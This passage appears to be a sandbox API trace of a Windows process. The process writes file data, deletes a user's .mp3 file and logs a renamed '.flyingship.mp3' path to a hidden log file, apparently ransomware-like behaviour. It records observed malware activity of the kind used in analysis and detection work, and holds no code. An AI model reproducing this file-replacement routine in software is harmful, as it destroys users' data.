hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.594] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0185.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0185.594] WriteFile (in: hFile=0x138, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0x7f10, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0x7f10, lpOverlapped=0x0) returned 1 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.595] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0185.596] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.596] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.596] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0185.597] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0185.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28d8 [0185.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0185.598] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0185.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0185.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0185.598] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0185.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0185.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0185.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0185.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0185.600] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.600] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0185.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0185.601] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.601] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.601] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFilePart=0x0) returned 0x5e [0185.602] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x13dddd20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0x90ae18 [0185.603] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\hdcqagk.mp3")) returned 1 [0185.616] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301269d0, ftCreationTime.dwHighDateTime=0x1d5e55d, ftLastAccessTime.dwLowDateTime=0xda3bfd50, ftLastAccessTime.dwHighDateTime=0x1d5d7d8, ftLastWriteTime.dwLowDateTime=0x13dddd20, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x7f10, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="HdCQAGk.mp3", cAlternateFileName="")) returned 0 [0185.616] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0185.617] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.617] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.617] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.617] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.618] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.618] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.618] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0185.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0185.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.619] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.620] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.620] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0185.620] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x233c, lpOverlapped=0x0) returned 1 [0185.620] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0185.620] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x233c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.620] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\n", cchWideChar=108, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 108 [0185.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\n", cchWideChar=108, lpMultiByteStr=0x906f38, cbMultiByte=108, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 108 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0185.621] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0185.621] WriteFile (in: hFile=0x138, lpBuffer=0x8fecd8*, nNumberOfBytesToWrite=0x6b, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x8fecd8*, lpNumberOfBytesWritten=0x87f43c*=0x6b, lpOverlapped=0x0) returned 1 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0185.621] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.621] CloseHandle (hObject=0x138) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0185.623] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900098 | out: hHeap=0x8a0000) returned 1 [0185.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0185.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.624] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0185.624] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0185.625] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0185.625] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 